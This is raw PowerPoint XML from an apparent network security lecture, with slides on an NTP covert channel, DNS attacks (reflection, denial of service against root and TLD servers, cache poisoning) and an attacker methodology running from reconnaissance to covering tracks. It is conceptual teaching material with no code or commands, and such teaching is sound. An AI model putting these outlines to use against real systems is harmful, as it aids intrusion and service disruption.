              <a:tr h="1690624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" dirty="0"/>
                        <a:t>4. Covert channel:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0"/>
                        <a:t> encoding information into the Reference ID, or source IP or hostname. Either the NTP server or another client will retrieve the information.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="130048" marR="130048" marT="65024" marB="65024"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" dirty="0"/>
                        <a:t>Not terribly difficult.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0"/>
                        <a:t> Attacker will need to control a DNS server to encode hostname</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="130048" marR="130048" marT="65024" marB="65024"/>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408072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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12725400" y="9461500"/>
            <a:ext cx="266700" cy="279400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11812588" y="9102725"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{08CAC1A6-436F-41A1-99CD-7CC212AE2B40}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34820" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="990600"/>
            <a:ext cx="11703050" cy="7524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DNS attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89093" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reflector attack: already discussed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Leverage DNS for attacks on arbitrary targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Denying DNS service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stop DNS root servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stop top-level-domain servers (e.g. .com domain)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stop local (default name servers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Use fake DNS replies to redirect user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Poisoning DNS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Insert false resource records into various DNS caches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>False records contain IP addresses operated by attackers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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12725400" y="9461500"/>
            <a:ext cx="266700" cy="279400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11812588" y="9102725"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47514E7A-A083-4663-88F3-894E2323D94E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35844" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="990600"/>
            <a:ext cx="11703050" cy="7524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Interlude: How DNS Works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35845" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1778000" y="1677988"/>
            <a:ext cx="9829800" cy="7785100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">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125" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="990600"/>
            <a:ext cx="11703050" cy="8286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4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Attack Methodology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5126" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="2057400"/>
            <a:ext cx="5791200" cy="76962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a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Recon – Information gathering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>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Scanning – Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>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Vulnerability Identification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>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Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gaining access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Elevating given access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Application/Web level attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Denial of Service (DOS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5128" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7035800" y="2209800"/>
            <a:ext cx="5334000" cy="1570038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Keeping Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Covering the tracks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Left Arrow 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5511800" y="4114800"/>
            <a:ext cx="977900" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50024"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000090"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Left Arrow 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5511800" y="5105400"/>
            <a:ext cx="977900" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50024"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000090"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6273800" y="6172200"/>
            <a:ext cx="6513923" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>TODAY’S LECTURE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12725400" y="9461500"/>
            <a:ext cx="266700" cy="279400"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A4EEF851-3DC9-41A9-ADB2-FB39AF52758B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>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accel="50000" decel="5000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2" presetClass="entr" presetSubtype="2" accel="50000" decel="5000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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>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1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="100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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12725400" y="9461500"/>
            <a:ext cx="266700" cy="279400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11812588" y="9102725"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D41263F4-E1CE-43EB-82A5-5C7B0D49867D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="990600"/>
            <a:ext cx="11053763" cy="6096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DDoS DNS Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="863600" y="1905000"/>
            <a:ext cx="11053763" cy="67056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30046" tIns="65023" rIns="130046" bIns="65023" numCol="2" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Oct 21, 2002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
